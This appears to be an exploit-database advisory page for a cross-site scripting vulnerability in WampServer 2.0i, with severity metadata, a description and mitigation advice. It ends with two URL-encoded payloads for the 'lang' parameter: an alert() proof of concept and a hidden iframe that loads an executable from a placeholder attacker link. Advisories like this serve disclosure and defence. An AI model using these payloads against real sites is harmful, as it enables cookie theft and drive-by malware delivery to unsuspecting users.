header-logo
Suggest Exploit
vendor:
WampServer
by:
Not mentioned
7.5
CVSS
HIGH
Cross-Site Scripting (XSS)
79
CWE
Product Name: WampServer
Affected Version From: WampServer 2.0i
Affected Version To: Other versions may also be affected
Patch Exists: NO
Related CWE: Not mentioned
CPE: a:wampserver_project:wampserver:2.0i
Metasploit:
Other Scripts:
Platforms Tested:
Not mentioned

WampServer Cross-Site Scripting Vulnerability

The WampServer software is prone to a cross-site scripting vulnerability. This vulnerability occurs because the software fails to properly sanitize user-supplied input. An attacker can exploit this issue by injecting arbitrary script code in the affected site's context. This can lead to the theft of authentication credentials and the execution of other malicious actions.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input sanitization and validation mechanisms in the WampServer software. Additionally, keeping the software up to date with the latest patches and security fixes is advised.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/38357/info

WampServer is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

WampServer 2.0i is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?lang=%3Cscript%3Ealert%28%22ZSL%20Testingz%22%29%3C/script%3E
http://www.example.com/index.php?lang=%3Ciframe%20height=%220%22%20width=%220%22%20frameborder=%220%22%20src=%22http://[evil .exe link]%22%3E%3C/iframe%3E